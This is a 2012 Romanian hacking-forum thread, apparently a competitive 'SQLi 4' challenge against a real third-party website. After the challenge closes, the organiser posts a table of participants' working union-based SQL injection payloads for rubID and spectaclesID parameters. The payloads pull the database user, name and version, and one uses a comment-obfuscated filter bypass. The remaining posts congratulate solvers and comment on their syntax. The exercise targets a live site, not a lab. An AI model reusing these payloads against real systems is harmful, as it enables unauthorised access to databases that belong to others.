[Medium/Hard]SQLi 4

Wubi · October 5, 2012

Deci...

Target: LE POCHE

Metoda: Union Based

Cerinte: User(),Database() sau Version().

Proof:

Site-ul este gasit de Sheyken si mi`a venit apa`n gura pana mi`am dat seama ca nu era chiar atat de greu. :))

[TABLE=class: grid, width: 800]

[TR]

[TD]Solvers:[/TD]

[TD]Syntax:[/TD]

[/TR]

[TR]

[TD]Sheyken[/TD]

[TD]-

[/TD]

[/TR]

[TR]

[TD]kl0w[/TD]

[TD]?rubID=-2%20+/*!50000UnIoN*/%20/*!50000SeLeCt%20aLl*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat%280x5645525349554e4541,0x3a,version%28%29,0x3a,0x4d657273692070656e74727520636f6d70657469746965%20%29,17--

[/TD]

[/TR]

[TR]

[TD]Sweby

[/TD]

[TD]?rubID=2 and 1=0 UNION SELECT null,null,0x5377656279,0x3a292920416d206761736974206e656e6f726f63697461,null,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),null,null,null,null,null,null,null,null,null,null,null--+

[/TD]

[/TR]

[TR]

[TD]ak4d3a[/TD]

[TD]?rubID=2+and+1=2+UnIoN+SeLeCt+1,2,version(),User(),5,Database(),7,8,9,10,11,12,13,14,15,null,17--

[/TD]

[/TR]

[TR]

[TD]neo.hapsis[/TD]

[TD]?rubID=2+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(user(),database(),version()),17--

[/TD]

[/TR]

[TR]

[TD]gafi[/TD]

[TD]?rubID=2+AND+1=2+UNION+SELECT+concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version())--

[/TD]

[/TR]

[TR]

[TD]badluck[/TD]

[TD]?spectaclesID=36 UNION ALL SELECT concat(database(),0x3a,user(),0x3a,version()),2,3,4,5,6--

[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[/TABLE]

Edited October 8, 2012 by Wubi

kl0w · October 5, 2012

Aici:

Wubi · October 5, 2012

Aici:

Astept si un PM cu sintaxa. E buna si rezolvarea asta, mi`ar fi placut output-ul ca in proof dar e ok.

kl0w · October 5, 2012

Tiam trimis un PM cu sintaxa! Mersi

Wubi · October 5, 2012

Tiam trimis un PM cu sintaxa! Mersi

E ok, felicitari, nu`si avea rostul bypass-ul ala acolo, in rest e bine.

kl0w · October 5, 2012

E ok, felicitari, nu`si avea rostul bypass-ul ala acolo, in rest e bine.

Da stiu ca nu are rost.

Dar am scris direct cu bypass in caz de trebuia sa nu mai schimb.L-am facut rapid .

Mersi oricum .

Sweby · October 5, 2012

malsploit · October 5, 2012

neo.hapsis · October 5, 2012

Nu am putut sa scot mai mult!

gafi · October 5, 2012

Wubi · October 8, 2012

Sintaxe postate, challenge closed.

Sign In

[Medium/Hard]SQLi 4

Recommended Posts

Wubi

kl0w

Wubi

kl0w

Wubi

kl0w

Sweby

malsploit

neo.hapsis

gafi

Wubi

Browse

Activity

Pages